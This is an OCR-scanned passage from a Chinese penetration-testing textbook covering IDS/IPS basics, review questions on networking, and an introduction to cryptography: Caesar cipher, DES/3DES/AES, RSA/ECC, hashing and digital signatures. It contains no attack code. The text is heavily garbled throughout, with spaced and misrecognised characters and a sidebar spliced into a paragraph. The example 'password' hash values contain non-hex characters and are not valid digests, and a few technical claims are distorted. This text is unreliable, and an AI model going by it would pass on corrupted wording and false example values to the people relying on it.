对 于 任何 渗透 测试 而 言 ， 入 侵 防 御 系 统 (Intrusion Prevention System，IPS) 和 入 侵 检 测 
系统 (Intrusion Detection System，IDS) 都 是 重点 关注 对 象 ， 因 为 测试 中 会 经 单 遇 到 它们 。 
作为 一 名 渗透 测试 者 ， 需 要 考虑 可 能 的 所 有 设备 。IPS 和 IDS 是 设置 于 网 络 中 用 于 捕获 网 络 
访问 活动 的 设备 。 学 习 的 关键 是 “小 步 不 停 步 ， 天 天 有 进步 ”。 首 先 让 我 们 熟悉 IPS 和 IDS 
的 基础 知识 :如果 知 道 其 工作 机 理 ， 也 就 能 学 习 如 何 规避 其 防御 。 

IDS 的 工作 目标 是 “检测 ”任何 可 疑 网 络 活动 ， 而 不 是 对 其 进行 啊 应 。 本 质 上 IDS 是 
被 动 的 。 用 通俗 的 语言 来 说 ， 这 意味 着 有 可 括 的 网 络 活动 时 ， 该 设备 将 以 通知 管理 员 发 生 
了 问题 的 方式 进行 被 动 啊 应 。 尽 管 是 被 动 的 ， 使 用 此 类 设备 的 好 处 是 它 能 够 在 不 会 对 整个 
网 络 的 运行 产生 负面 影响 的 前 提 下 ， 有 效 地 捕捉 可 能 的 恶意 网 络 活 动 。 而 其 明显 的 缺点 
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是 ， 其 能 够 做 出 的 唯一 啊 应 是 发 出 一 条 通知 消息 。 另 一 方面 ，IPS 则 是 主动 和 预防 性 的 。 
IPS 不 仅 可 以 感知 网 络 上 的 潜在 恶意 活动 ， 还 可 以 采取 措施 防止 进一步 的 损害 ， 阻 止 进 一 


2.3 ”本 芋 小 结 


在 本 章 中 ， 介 绍 了 一 些 信息 安全 相关 的 基础 知识 。 首 先 ， 我 们 讨论 了 操作 系统 的 作用 
和 当今 市 场 上 不 同类 型 的 操作 系统 ， 如 Linux、Unix 和 微软 Windows。Windows 是 目前 市 面 
上 最 受 欢 迎 的 操作 系统 ， 占 有 超过 75% 的 桌面 和 服务 器 市 场 。 在 渗透 测试 人 员 和 安全 专家 
中 ， 最 受 欢迎 的 是 灵活 而 强大 的 Linux 操 作 系 统 。 

本 章 还 介绍 了 网 络 知识 ， 包 括 网 络 的 不 同类 型 和 相应 的 配置 。 我 们 讨论 了 OSI 模型 的 7 
个 层次 以 及 它们 在 网 络 设 计 和 运行 中 的 意义 ， 还 介绍 了 它们 如 何 定义 网 络 的 功能 。 最 后 ， 
本 书 介 绍 了 IP 协 议和 典型 网 络 协议 的 基础 知识 。 


2.4 “过 题 


1. OSI 模型 的 目的 是 什么 ? 

2. TCP 和 UDP 有 何 区 别 ? 

3. MAC 地 址 是 什么 ， 它 存储 在 何 处 ? 

4. 公 网 和 内 网 JP 地 址 有 什么 区 别 ? 

5. 在 IPv4 地 址 中 ， 主 机 地 址 和 网 络 地 址 有 什么 区 别 ? 
6. 什么 是 路 由 器 ， 它 工作 在 OSI 模 型 的 哪 一 层 ? 

7. IPv4 地 址 中 有 多 少 位 ? 


密码 学 简介 


密码 学 涉及 安全 和 信息 技术 的 许多 不 同 领 域 ， 同 样 也 涉及 活 透 测试 。 在 后 续 章 节 中 将 
学 习 的 很 多 方法 要 么 使 用 了 不 同方 面 的 密码 学 知识 ， 要么 可 通过 应 用 密码 学 工具 和 技术 简 
单 地 失效 。 事 实 上 ， 如 果 没 有 密码 学 ， 在 茶 些 情况 下 电子 商务 和 数据 保护 中 使 用 的 多 种 机 
制 将 不 可 能 存在 。 因 此 ， 本 章 将 介绍 密码 学 的 不 同 领域 ， 以 及 对 密码 学 的 了 解 将 如 何 提升 
渗透 测试 者 的 能 力 。 


本 章 将 学 习 : 

认识 密码 学 的 目标 

定义 密码 学 领域 的 重要 术语 
区 分 对 称 加 密 与 非 对 称 加 密 
学 习 数 据 哈 希 技 术 

了 解 如 何 使 用 PKI 


oe 


3.1 认识 密码 学 的 4 个 目标 


密码 学 领域 关注 信息 的 处 理 以 及 将 信息 变换 为 不 同 目标 形式 。 变 换 的 方法 可 以 是 多 种 
方法 之 一 ， 甚 至 可 以 是 混合 方法 ， 即 组 合 使 用 不 同 的 方法 以 得 到 特定 的 期 望 结果 。 密 码 学 


机 窗 性 
机 密 性 意味 着 需要 保持 秘密 或 私有 的 信息 只 能 由 得 到 与 该 信息 进行 交互 或 查看 的 授权 
的 相关 方 访问 。 


元 整 性 

密码 学 由 在 保护 数据 和 信息 的 完整 性 ， 或 至 少 提供 一 种 检测 对 某 条 指定 信息 的 未 授权 
更 改 的 手段 。 给 定 方 接收 或 访问 的 一 条 信息 需要 问 接 收 方 提供 一 定 的 置信 度 ， 确 保 该 信息 
准确 且 在 收 件 人 接收 或 访问 该 信息 之 前 未 进行 任何 更 改 。 


认证 
认证 意味 着 应 用 了 某 种 机 制 以 确保 收 到 的 信息 来 自给 定 的 来 源 并 真实 有 效 。 实 际 上 ， 


几乎 每 种 在 网 络 上 和 其 他 情况 中 使 用 的 主流 认证 机 制 都 需要 使 用 茶 种 程度 的 密码 学 以 正 帝 
工作 。 


个 可 否认 性 

不 可 否认 性 是 一 种 保证 某 行为 的 行为 方 或 用 起 人 可 以 明确 而 无 歧义 地 绑 定 到 茶 一 方 的 
属性 。 有 了 不 可 否认 的 机 制 ， 即 有 可 能 构建 这 样 的 一 个 系统 ， 在 该 系统 中 ， 可 将 茶 种 特定 
行为 直接 奶 漳 到 行为 者 个 人 或 团体 ， 而 不 存在 抵赖 该 行为 的 现实 可 能 性 。 

在 目前 称 为 密码 学 的 知识 体系 内 ， 并 没有 一 种 放 之 四 海 而 皆 准 的 技术 能 解决 所 有 这 些 
问题 。 在 实践 中 ， 一 个 系统 需要 将 其 优 缺点 与 其 他 系统 的 优 缺 点 结合 起 来 ， 以 实现 全 面 保 
护 的 解决 方案 。 这 通常 被 称 为 混合 密码 系统 。 在 从 电子 商务 到 检索 电子 邮件 再 到 解密 硬盘 
上 的 数据 等 多 种 日 常 使 用 的 系统 中 ， 大 多 应 用 了 混合 密码 系统 。 


3.2 ”加 密 的 历史 


有 一 些 古 代 文明 使 用 的 古老 技术 虽然 要 比 今天 的 技术 简单 ， 却 足以 阐述 密码 学 特别 是 
加 密 的 概念 。 
当 称 为 象形 文字 的 书写 系统 诞生 时 ， 它 是 一 种 只 有 少数 
> 在 木 书 中 密码 学 人 才能 学 习 的 语言 。 学 习 如 何 使 用 象形 文字 的 人 主要 是 皇室 或 
加 窗 技 术 是 指 对 于 安全 通 宗教 领袖 成 员 。 正 是 由 于 这 种 对 该 语言 的 垄断 ， 随 着 古 埃及 文 
信 技 术 的 研究 和 应 用 的 整 ” 明 的 衰亡 以 及 新 的 宗教 制度 和 信仰 的 诞生 ， 象 形 文字 的 含义 失 
体 ， 而 加 密 则 是 指 密码 学 ” 传 了 。 在 解密 这 些 象 形 文字 之 前 ， 许 多 人 认为 这 些 符 号 代表 了 
技术 中 处 理 信 息 机 密 性 的 。 从 生命 的 秘密 到 特殊 的 魔法 药剂 ， 甚 至 是 如 何 获得 永生 的 方法 
0 的 各 种 各 样 的 意义 。 显 然 ， 这 些 认识 都 源 自 无 人 能 够 解码 该 语 
言 的 事实 。 
这 对 于 我 们 研究 密码 学 和 加 密 有 何 意义 ? 首先 ， 这 是 一 个 传达 对 外 部 观察 者 而 言 并 
不 显然 无 疑 的 思想 的 系统 。 这 正 是 加 密 的 功能 :将 一 条 消息 变换 为 一 种 对 不 了 解 该 系统 工 
作 机 理 的 人 而 言 不 易 理 解 的 格式 。 接 下 来 ， 可 以 得 出 结论 ， 思 想 可 以 从 一 种 语言 转换 为 象 
形 文字 ， 也 可 以 从 象形 文字 转换 为 原始 语言 。 这 对 于 加 解密 而 言 同样 适用 : 通过 加 密 某 些 
信息 可 以 变换 为 其 他 人 不 了 解 的 格式 ， 也 可 以 通过 解密 变换 成 任何 人 都 可 以 轻松 阅读 的 格 
式 。 最 后 ， 通 过 使 用 当今 世界 称 为 密码 分 析 (cryptanalysis) 的 技术 逆 回 这 和 套 符 号 系统 ， 而 不 
是 通过 正 向 掌握 系统 如 何 工作 ， 语 言 学 家 能 够 解析 符号 背后 的 意义 。 事 实 上 ， 语 言 学 家 用 
来 解读 象形 文字 的 流程 是 模式 识别 。 它 与 频率 分 析 (frequency analysis) 的 流程 大 致 相似 ， 后 
者 本 身 则 是 寻找 可 能 提示 消息 的 原始 内 容 或 含义 的 模式 和 分 组 的 过 程 。 
两 千年 来 ， 还 出 现 了 其 他 一 些 著名 的 密码 系统 ， 例 如 第 二 次 世界 大 战 期 间 出 现 的 “ 谜 


语 ” 密 码 机 (enigma machine)。 第 二 次 世界 大 战 中 ， 德 国 盏 方 使 用 这 一 机 峰 与 战场 上 的 海 
军 部 队 和 陆军 部 队 收 发 编码 信息 。 该 机 器 基本 上 类 似 于 一 台 打 字 机 ， 区 别 之 处 在 于 它 有 一 
套 由 拨号 盘 、 齿 轮 和 插头 组 成 的 系统 。 通 过 将 该 系统 设置 为 不 同 的 组 合 ， 可 将 打字 输入 系 
统 的 消息 输出 为 不 同 的 字符 和 字母 组 合 ， 如 果 不 知道 原始 设 定 的 编码 配置 ， 几 乎 不 可 能 破 
解 加 密 的 消息 。 

在 第 二 次 世界 大 战 后 的 数 十 年 中 ， 密 码 系 统 和 加 密 搁 术 一 直 保 持 看 快速 的 发 展 势头， 
并 且 这 一 势头 还 将 持续 。 最 新 的 进展 赛 括 了 从 非 对 称 和 公 钥 系统 到 基于 量子 物理 的 高 性 能 
密码 系统 等 种 种 技术 。 


3.3 ”密码 学 第 用 语 


在 此 提供 一 些 密码 学 领域 的 通用 定义 ， 在 审核 或 评估 不 同 技术 和 系统 时 ， 或 在 审查 客 
尸 组 织 的 法 律 或 规章 标准 时 会 经 常用 到 它们 。 法 规 中 也 可 能 经 党 包括 加 密 和 解密 以 及 算 
法 等 术语 。 作 为 渗透 测试 者 ， 如 果 客 户 要 求 满足 茶 些 标准 或 规定 ， 则 需要 熟悉 这 里 提供 的 
术语 。 


明文 
明文 是 指 加 密 系 统 处 理 前 的 任何 信息 。 它 未 经 加 密 变 换 成 男 一 种 形式 ， 可 以 是 二 i 
制 信 息 ， 例 如 系统 中 的 可 执行 文件 和 数据 文件 。 


密 广 

密 文 是 明文 经 过 加 密 系统 变换 后 的 结果 。 按 照 设计 ， 除 非 破译 者 了 解 加 密 系统 并 且 知 
道 用 于 将 密 文 变换 为 明文 的 特定 组 合 或 顺序 ， 否 则 密 文 不 会 易于 破译 。 可 如 此 解释 加 解密 
语 境 中 的 明文 和 密 文 术语 :可 以 使 用 加 密 将 明文 变换 为 密 文 ， 同 样 也 可 以 使 用 解密 将 密 文 
变换 成 明文 。 


算法 

要 将 明文 转换 为 密 文 或 将 密 文 转换 为 明文 ， 需 要 使 用 算法 。 可 将 算法 视 为 一 个 公式 ， 
描述 为 实现 所 需 的 结果 必须 以 何 种 顺序 完成 哪些 特定 步 又 的 一 套 流程 。 算 法 给 出 一 系列 可 
重复 的 一 致 的 步 又， 按照 这 些 步 又， 可 实现 系统 设计 人 员 期 望 的 任意 结果 。 作 为 一 名 渗透 
测试 者 ， 需 要 熟悉 许多 不 同 的 算法 名 称 和 类 型 ， 以 理解 何 种 算法 适合 解决 何 种 问题 。 
角 
一 种 算法 要 负责 定义 一 个 密 钥 ， 或 者 更 具体 地 说 是 一 个 密 钥 空间 。 当 讨论 一 个 算法 及 
其 明文 / 密 文 的 相互 变换 时 ， 会 很 快 发 现 只 了 解 算 法 本 身 聊 胜 于 无 。 这 是 因为 一 种 优良 算 


天 | 
| 


上 时 
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法 会 定义 不 同 设置 ， 可 用 于 将 任何 信息 从 一 种 格式 变换 为 另 一 种 格式 。 事实 上 ， 更 准确 地 
说 ， 算 法 会 定义 可 以 用 于 格式 变换 的 所 有 可 能 设置 ， 但 该 算法 不 会 告诉 你 任意 一 条 加 密 信 
息 所 使 用 的 具体 设置 。 

想象 一 下 ， 某 个 算法 定义 英文 中 的 每 个 字母 都 可 以 用 1~26 的 数字 表示 。 该 算法 定义 ， 
在 将 明文 中 的 所 有 字母 按照 其 在 字母 表 中 的 排列 顺序 变换 为 数字 后 ， 再 向 每 个 数字 加 上 一 
个 数 ( 即 密 钥 ) 得 到 一 个 新 数字 ， 反 过 来 又 按照 字母 表 位 置 表示 一 个 新 的 字母 

例如 ， 如 果 规 定 字母 A 等 于 1 并 选择 4 作为 密 钥 ， 则 1+4 等 于 5，E 是 字母 表 的 第 5 个 字 
母 。 这 样 ， 消 息 中 的 字母 A 将 被 替换 为 字母 E。 通 过 继续 该 过 程 ， 对 消息 中 的 每 个 字母 进 
行 此 变换 ， 即 完成 了 使 用 密 钥 将 明文 变换 为 密 文 的 过 程 。 

尝试 解码 这 种 简单 系统 的 人 最 终 可 能 会 找到 正确 的 密 铀 4。 然 而 ， 现 代 系统 具备 数 
百 万 种 可 能 性 ， 需 要 几 辈 子 的 时 间 才 能 获得 正确 的 密 钥 。 使 用 现代 算法 生成 的 可 能 的 密 钢 
数量 被 称 为 密 钥 空间 。 


3.4 比较 对 称 和 非 对 称 加 密 扩 术 
加 密 技 术 可 分 为 两 种 主要 类 型 : 对 称 加 密 和 非 对 称 加 密 (也 称 为 公 钥 加 密 )。 


3.4.1 ”对称 加 密 技术 


对 称 加 密 也 被 称 为 传统 加 密 技 术 ， 因 为 它 已 存在 多 年 。 对 称 系统 将 明文 使 用 一 个 密 铀 
通过 某 种 算法 进行 处 理 ， 得 到 密 文 。 要 逆 同 这 一 由 给 定 密 钥 (假设 密 钥 为 4) 的 算法 将 明文 
变换 为 密 文 的 处 理 过 程 (也 就 是 将 密 文 变换 回 明文 ) 时 ， 不 能 随意 使 用 其 他 密 钥 。 必 须 再 次 
使 用 密 钥 4 才能 成 功 进 行 逆 变换 。 换 言 之 ， 在 对 称 系 统 中 ， 加 密 和 解密 信息 使 用 相同 的 密 
钥 。 其 概念 如 图 3.1 所 示 。 

同 任何 技术 一 样 ， 这 一 简单 性 有 利 有 浆 。 对 称 系统 的 优点 众多 ， 这 里 重点 介绍 其 中 一 
些 明 显 的 优点 。 

@ 在 将 明文 变换 为 密 文 时 ， 对 称 系 统 很 快 ， 特 别 是 在 处 理 大 量 信息 (有 时 称 为 批量 数 

据 ) 时 ， 反 之 亦 然 。 随 着 数据 量 的 增加 ， 速 度 效 益 变 得 更 加 显著 ， 与 提供 加 蜜 服务 
的 其 他 系统 相 比 ， 系 统 效 率 优势 也 更 大 。 事 实 上， 大 多 数 (如 果 不 是 全 部 ) 对 称 系统 
被 专门 设计 用 于 满足 批量 数据 处 理 的 特殊 需求 和 特性 。 

@ 对 称 系统 的 另 一 个 优点 是 它们 在 现代 服务 器 和 其 他 技术 中 应 用 的 某 些 认证 技术 中 

占有 一 席 之 地 。 
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图 3.1 使 用 单个 密 钥 的 对 称 加 密 系 统 示例 


俗话 说 ， 有 所 得 必 有 所 失 ， 对 称 算法 也 是 如 此 。 以 下 是 对 称 系统 的 缺点 : 

@ 对 称 系 统 缺乏 密 钥 管理 系统 ， 或 者 说 至 少 缺 乏 一 个 易于 实施 的 密 钥 管理 系统 。 如 
前 所 述 ， 该 系统 使 用 同一 个 密 钥 进行 加 密 和 解密 ， 问 题 出 现在 加 密 信 息 后 需要 将 
其 发 送 到 接 下 来 需要 解密 数据 的 另 一 方 时 。 为 此 不 仅 需 要 算法 ， 还 需要 密 钥 。 此 
处 的 挑战 是 如 何 将 加 密 的 数据 和 密 钥 传递 给 另 一 方 ， 且 避免 落 入 未 经 授权 拥有 该 
信息 者 的 手中 。 显 然 不 能 同时 发 送 密 钥 和 数据 ， 因 为 这 样 做 任何 正在 罚 听 的 人 都 
可 以 捕获 两 者 ， 从 而 拥有 了 查看 希望 保密 的 信息 所 需 的 一 切 。 
解决 这 一 密 钥 管理 问题 的 方法 是 使 用 一 个 带 外 (out-of-band) 分 发 流程 。 简 而 言 之 ， 
在 加 密 数 据 并 发 送 给 第 三 方 时 ， 不 应 使 用 传送 密 钥 的 同一 条 路 径 发 送 该 信息 (无 论 
是 立即 发 送 还 是 稍 后 发 送 )， 而 应 改 用 另 一 路 径 发 送信 息 。 传 送 密 钥 的 方式 可 以 是 
打 电 话 ， 把 钥匙 写 在 纸 上 交 给 对 方 ， 或 者 骑 上 摩托 车 穿 过 城镇 送 “ 钥 ”上 门 。 只 要 
不 与 加 密 数 据 使 用 相同 的 途径 即 可 。 但 是 ， 如 你 所 见 ， 这 是 一 种 笨拙 的 处 理 方式 。 

@ 对 称 系统 的 另 一 个 重要 问题 是 ， 事 实 上 在 系统 中 没有 明确 的 提供 不 可 否认 性 能 . 
的 手段 。 如 果 要 使 用 密 钥 来 识别 个 人 ， 则 不 能 使 用 密 钥 和 对 称 系统 ， 以 及 迄今 所 
知 的 任何 其 他 可 用 类 似 系 统 ， 来 识别 某 个 特定 加 密 操作 的 执行 者 。 无 法 将 某 个 密 
钥 退 溯 到 特定 个 人 。 

恺 撤 密 码 是 最 早 且 较 为 简单 的 对 称 加 密 系 统 之 一 ， 同 时 即使 对 于 今天 的 对 称 系 统 ， 它 
也 可 以 作为 一 个 很 好 的 说 明 系 统 工作 原理 的 示例 。 理 解 该 对 称 系统 有 助 于 正确 应 用 当今 的 
其 他 对 称 系统 。 

恺 撒 密 码 的 工作 方式 与 所 有 有 具有 低 复 杂 度 的 对 称 密码 一 样 。 在 该 系统 中 ， 明 文 在 字母 
表 中 右 移 一 定位 置 。 例 如 ， 当 移 位 量 为 1 时 ，A 将 被 B 蔡 代 ，B 将 变 为 C， 依 此 类 推 。 广 为 
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人 知 的 ROT13 加 密 系 统 是 已 撤 密 码 的 一 个 移 位 量 为 13 的 变 体 。 与 现代 系统 相 比 ， 已 撤 密 码 
几乎 没有 通信 安全 性 可 言 ， 人 工 即 可 轻易 破解 。 
为 了 将 加 密 的 消息 从 一 方 传递 到 另 一 方 ， 双 方 必 须 拥 有 一 个 密 钥 ， 以 便 发 送 方 能 对 其 
进行 加 密 ， 接 收 方 可 以 对 其 进行 解密 。 对 于 已 撤 密码 而 言 ， 密 钥 就 是 密 文 在 字母 表 中 的 字 
将 明文 输入 The way of the hero leads to the Triforce 使 用 移 位 量 3 进 行 加 密 的 示例 如 下 。 
明文 : The way of the hero leads to the Triforce 
密 文 : WKH ZDB RI WKH KHUR OHDGV WR WKH WULIRUFH 
很 容易 看 出 明文 中 的 每 个 字符 如 何在 字母 表 中 移动 。 通 过 使 用 -3 的 偏 移 量 来 解密 也 同 


当前 有 大 量 可 用 的 对 称 算法 ; 下 面 的 算法 是 涂 透 测试 者 最 表 遇 到 的 对 称 加 密 算 法 。 

Dd 数据 加 密 标准 (Data Encryption Standard, DES): 在 当今 的 许多 应 用 程序 中 仍 
能 见 到 DES 算 法 ， 但 鉴于 该 算法 脆弱 而 易 被 破解 ， 应 该 在 应 用 程序 中 避免 使 
用 。 在 此 处 列 出 的 对 称 加 密 算 法 中 ，DES 最 为 脆弱 ， 在 以 保密 性 为 第 一 考虑 
的 应 用 程序 中 应 避免 使 用 DES。 

@ 三 重 DES(3DES): 该 算法 是 DES 算 法 的 扩展 ， 其 加 密 强 度 是 DES 算 法 的 三 
倍 。 在 无 线 网 络 、 电 子 商 务 和 驱动 絮 加 和 密 等 应 用 程序 中 常用 该 算法 。 

@ 高 级 加 密 标 准 (Advanced Encryption Standard，AES): 作为 DES 的 替代 品 ， 
AES 和 3DES 是 同期 产品 。 和 3DES 一 样 ， 该 算法 在 多 种 现代 技术 中 很 流行 。 

@ 国际 数据 加 和 密 算 法 (Intermmational Data Encryption Algorithm，IDEA): 这 个 算法 
通常 会 在 Pretty Good Privacy(PGP) 系 统 中 过 到 。 

这 个 列表 绝 非 在 现实 世界 中 使 用 的 算法 全 集 。3DES 和 AES 是 最 可 能 遇 到 的 。 


3.4.2” 非 对 称 ( 公 钥 ) 加 密 近 术 


非 对 称 (或 公 钥 ) 加 密 技 术 是 最 新 的 加 密 形 式 之 一 ( 它 已 有 大 约 40 余 年 的 历史 )。 非 对 称 
系统 能 提供 一 些 对 称 系统 无 法 提供 (或 至 少 能 用 更 有 效 的 方式 提供 ) 的 优点 。 具 体 而 言 ， 这 
种 类 型 的 加 密 提 供 了 对 称 系 统 中 缺乏 的 功能 ， 例 如 不 可 否认 性 和 密 钥 分 发 方面 的 优 操 。 

比较 非 对 称 系统 与 对 称 系 统 时 ， 有 一 个 从 一 开始 就 很 明显 的 主要 区 别 : 系统 中 使 用 的 
密 钥 数量 。 基 于 非 对 称 系统 的 构建 方式 ， 将 为 该 类 系统 的 参与 者 颁发 两 个 而 非 一 个 密 钥 ， 
其 中 一 个 是 公 钥 ， 男 一 个 是 私 钥 。 


公 钥 和 私 钥 之 间 有 何 区 别 ? 
@ 公 钥 是 任何 该 密 钥 请 求 者 均 可 无 明显 限制 (至 少 在 请 求 时 点 上 ) 任 意 访问 的 密 钥 。 
@ 私 钥 是 配合 公 钥 使 用 的 密 铀 ， 顾 名 思 义 ， 该 密 钥 是 私有 的 。 按 照 定 义 ， 未 被 专门 
分 配 私 钥 的 任何 人 均 不 能 访问 该 密 钥 ， 以 保证 系统 正常 工作 。 
当 个 人 或 组 织 在 系统 中 注册 时 ， 将 生成 一 个 由 公 钥 和 私 钥 组 成 的 密 钥 对 。 这 对 密 钥 
从 创建 之 时 直到 销毁 痢 彼 此 链接 ， 意 味 者 使 用 一 个 密 钥 执行 的 加 密 只 能 使 用 男 一 个 密 钥 解 
窗 。 这 对 密 钥 的 为 一 个 重要 属性 是 ， 任 何 持 有 一 个 密 钥 的 人 无 论 多 么 仔细 地 分 析 该 密 钥 ， 


都 无 法 确定 男 一 个 密 钥 的 特征 。 在 讨论 此 类 系统 时 ， 这 是 一 个 必须 记 住 的 事项 。 正 是 因为 
这 一 独特 属性 ， 可 以 发 布 一 个 任何 人 均 可 访问 的 公开 密 钥 ;不 存在 能 够 访问 公共 密 钥 的 人 
获知 私 钥 的 风险 ， 因 此 保护 了 私 钥 本 号 。 

在 该 非 对 称 系统 中 ， 任 何 一 个 密 钥 均 可 用 于 执行 加 密 ， 也 可 以 用 于 执行 解密 ; 然而 ， 
两 个 密 钥 都 不 能 用 于 对 同一 条 信息 执行 两 种 操作 。 换 言 之 ， 如 果 私 钥 用 于 加 密 某 个 给 定 明 
文 ， 则 不 能 用 于 解密 该 明文 加 和 密 后 生成 的 密 文 。 解 密使 用 私 钥 创建 的 密 文 的 唯一 方法 是 使 
用 公 詹 。 

那么 ， 相 比 于 对 称 加 密 系 统 ， 使 用 非 对 称 或 公 钥 系统 有 什么 优点 呢 ? 

@ 第 一 个 优点 是 密 钥 管理 。 密 钥 管 理 更 为 简单 ， 因 为 密 钥 不 需要 分 发 给 任何 其 他 系 

统 使 用 者 。 实 际 上 ， 任 何 注册 到 系统 中 的 人 都 将 得 到 一 个 为 其 生成 的 密 钥 对 ， 密 
钥 对 中 的 私 钥 由 他 们 单独 保管 ， 而 公 钥 则 公开 发 布 ， 供 任何 需要 进行 与 私 钥 持 有 
者 相关 的 加 密 / 解 密 操作 的 人 获取 。 正 因为 如 此 ， 除 了 发 布 公 钥 之 外 ， 不 需要 密 钥 
的 分 发 过 程 。 

@ 非 对 称 系 统 的 第 二 个 优点 是 ， 当 这 个 密 钥 对 是 为 个 人 生成 时 ， 如 果 他 们 单独 拥有 
一 个 私 钥 并 保持 该 私 钥 的 机 密 性 和 安全 的 所 有 权 ， 那 么 这 就 成 为 一 种 决定 性 的 解 
决 不 可 否认 性 问题 的 方法 。 换 言 之 ， 如 果 收 到 一 条 来 自 个 人 的 加 密 信 息 ， 则 接收 
方 只 需要 获取 前 者 的 公 钥 ， 并 使 用 该 公 钥 解密 接收 到 的 信息 。 如 果 解 密 过 程 成 
功 ， 则 可 确定 它 来 自 某 个 特定 的 发 件 人 。 除 非 发 件 人 丢失 了 他 们 的 密 钥 的 控制 权 
且 未 报告， 否则 他 们 无 法 否认 自己 发 送 了 该 条 信息 。 

非 对 称 系统 的 最 大 缺点 在 于 使 用 不 对 称 算法 处 理 越 来 越 大 的 数据 量 时 性 能 不 佳 。 换 名 
话说 ， 非 对 称 系统 对 于 批量 数据 表现 不 佳 ， 根 据 茶 些 估计 ， 对 应 的 对 称 加 密 系 统 可 在 性 能 
方面 超过 其 1000 倍 。 

要 使 公 钥 系统 有 效 工 作 ， 必 须 有 一 种 途径 ， 以 一 种 得 到 普遍 信任 的 方式 将 密 钥 对 无 
二 义 地 、 机 密 地 关联 到 给 定 的 个 人 或 团体 。 公 共 密 钥 基础 设施 (Public Key Infrastructure， 
PKD 以 及 3.7 节 中 将 介绍 的 几 种 其 他 方法 专用 于 处 理 该 问题 。 
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党 用 非 对 称 加 密 算法 
多 年 来 已 经 开发 了 许多 非 对 称 加 密 法 ,但 是 在 日 第 工 作 中 可 能 只 会 遇 到 其 中 一 
小 部 分 。 

@ RSA: 这 是 20 世 纪 70 年 代 后 期 在 美国 开发 的 算法 ， 它 现在 仍 被 继续 用 于 许多 
不 同 的 系统 中 。 

@ ECC， 即 椭圆 曲线 密码 (Elliptical Curve Cryptography): 这 是 一 种 在 移动 设备 
和 其 他 计算 性 能 较 高 的 系统 中 被 三 沁 应 用 的 系统 。 

@ Diffie-Hellman: 这 更 接近 于 一 个 密 钥 交换 协议 ， 而 非 实际 的 数据 加 密 机 制 。 
Diffe-Hellman 在 今天 的 许多 应 用 程序 中 颇 为 流行 。 


3.S 通过 哈 希 中 法 构 换 数 撕 


哈 希 算法 是 数据 变换 的 另 一 种 方法 ， 但 它 与 加 密 或 解密 有 所 不 同 。 哈 希 操作 的 目标 是 
验证 期 望 加 以 该 层次 保护 的 信息 的 完整 性 。 实 际 上 ， 哈 希 操作 不 提供 任何 机 密 性 功能 ， 这 
意味 着 任何 经 过 哈 希 算法 处 理 的 信息 只 能 提供 一 种 检查 信息 完整 性 的 手段 。 该 信息 仍然 会 
保留 在 使 用 哈 希 算法 处 理 之 前 的 原始 格式 。 

哈 希 是 一 个 单 向 过 程 ， 即 通过 哈 希 算法 处 理 的 信息 仍然 保持 原始 格式 ， 但 该 算法 会 产 
生 一 个 固定 长 度 的 字符 串 ， 对 于 每 个 唯一 输入 ， 输 出 字符 串 都 是 唯一 的 。 虽 然 每 个 输入 的 
字符 序列 会 有 很 大 差别 ， 但 所 产生 的 哈 希 值 或 消息 摘要 的 实际 长 度 将 始终 相同 。 基 于 这 些 
算法 所 设计 的 哈 希 消息 摘要 方式 ， 可 认为 它们 是 不 可 能 或 数学 上 无 法 逆向 的 。 

下 面 用 一 组 简单 例子 介绍 哈 希 过 程 。 为 了 说 明 哈 希 操作 的 过 程 ， 将 使 用 password 一 词 
开始 ， 然 后 向 其 后 添加 一 个 字符 ， 以 体现 输出 的 变化 。 在 下 面 的 例子 中 ， 原 始 输入 和 输出 
分 居于 等 号 左右 两 侧 。 

Password = SFA4DCC3BSAAT76SD61D8327DEB882CF99 

Passwordl = 7C6A180B36896A0A8C02787EEAFBOE4C 

Password2 = 6CB7SF65S2A9BS2798EB6CF2201037C73 

Password3 = 819B0643D6B89DC9BS79FDFC9094F28E 

Password4 = 34CC93ECEOBA9E3F6F235D4AF979B16C 

PasswordS = DBOEDDO4AAAC4S506F7EDABO3AC85SSD56 

这 些 例子 可 见 ， 输 入 字符 串 的 每 个 变化 (甚至 只 是 单个 字符 的 改变 ) 都 会 导致 生成 的 
哈 希 值 发 生 显著 变化 。 在 实践 中 ， 这 种 变化 只 会 告知 查看 者 信息 发 生 了 更 改 ， 但 不 会 告 
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何 处 发 生 了 更 改 ， 从 而 提示 进行 更 细致 的 原始 输入 检查 或 其 他 操作 。 哈 希 值 是 将 信息 压 纵 
为 固定 长 度 值 的 结果 。 单 辐 哈 希 函 数 有 时 也 称 为 一 次 性 密码 密 钥 或 指纹 。 


常用 哈 希 算法 

下 面 是 目前 常用 的 两 种 哈 希 算法 。 

@ Message Digest 5(MD5): MD5 在 软件 应 用 程序 、 数 字 签 名 和 其 他 环境 中 仍然 
非常 流行 。 在 许多 场合 ，MD5 已 被 SHA2 蔡 代 。 

@ 安全 哈 希 算法 (Secure Hash Algorithm ，SHA) 系 列 。 
。 SHA-0: 曾 在 SHA-1 之 前 使 用 ， 现 已 被 SHA-1 蔡 代 。 
”SHA-1: 为 一 个 更 为 常用 的 哈 希 算法 ， 该 算法 已 被 破解 。 
。 SHA-2: 设计 用 于 SHA-1 的 升级 。 


3.6 一 种 混合 系统 : 使 用 数字 签名 


到 目前 为 止 ， 本 书 已 经 介绍 了 许多 不 同 的 系统 :对称 加 密 、 非 对 称 加 密 和 哈 希 。 本 书 
尚未 进行 的 是 说 明 具体 如 何 基于 这 些 不 同系 统 构建 更 复杂 的 解决 方案 。 通 过 集成 这 些 不 同 
的 技术 可 创建 多 种 密码 系统 ， 事 实 上 ， 将 这 些 技术 组 合 运用 来 共同 构建 不 同 的 通常 统称 为 
混合 密码 系统 的 解决 方案 是 一 种 通用 做 法 。 本 节 中 介绍 的 则 是 其 中 之 一 ， 数 字 签名 。 

作为 一 个 渗透 测试 者 ， 会 遇 到 驱动 程序 、 日 志文 件 、 数 据 和 其 他 项 的 数字 签名 。 需 要 
知道 的 是 ， 对 于 使 用 了 数字 签名 的 目标 ， 改 变 或 扰乱 其 内 容 将 使 签名 无 效 ， 并 可 能 给 行为 
留 下 事后 证 据 。 

为 说 明 数 字 签名 ， 可 分 析 传统 的 墨水 纸张 签名 的 特征 ， 以 借鉴 该 知识 帮助 更 好 地 理解 
数字 签名 。 设 想 一 下 在 纸张 上 签名 的 行为 。 当 你 在 一 张 纸 上 签 上 名 字 时 ， 由 于 签名 应 当 是 
你 独 有 的 ， 因 此 你 提供 了 一 种 验证 身份 的 方式 和 一 种 实现 不 可 否认 性 的 手段 。 因 为 在 理论 
